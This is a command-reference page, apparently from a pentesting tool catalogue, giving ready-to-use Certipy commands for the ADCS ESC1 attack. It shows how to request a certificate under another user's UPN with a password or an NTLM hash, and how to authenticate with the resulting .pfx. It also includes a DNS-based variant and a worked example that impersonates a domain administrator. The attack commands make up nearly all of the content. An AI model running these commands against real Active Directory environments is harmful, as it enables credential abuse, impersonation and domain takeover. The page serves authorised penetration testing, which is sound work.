Certipy ESC1 (Subject in Request)

Exploit ESC1: a template that allows the requester to specify a Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) lets you request a certificate with someone else's UPN. The resulting cert authenticates as that user.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -template '<vulnerable_template>' -upn '<target_user>@<domain>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

certipy req -u '<user>@<domain>' -hashes ':<hash>' -dc-ip <dc-ip> -ca '<ca_name>' -template '<template>' -upn '<target>@<domain>'

Then Authenticate requires no credentials

certipy auth -pfx <target>.pfx -dc-ip <dc-ip>

DNS-based (computer SAN) requires password

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -template '<template>' -dns '<dc-fqdn>'

Examples

certipy req -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -template 'VulnUserCert' -upn 'administrator@corp.local'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

Tags

certipy adcs esc1 upn san impersonation

References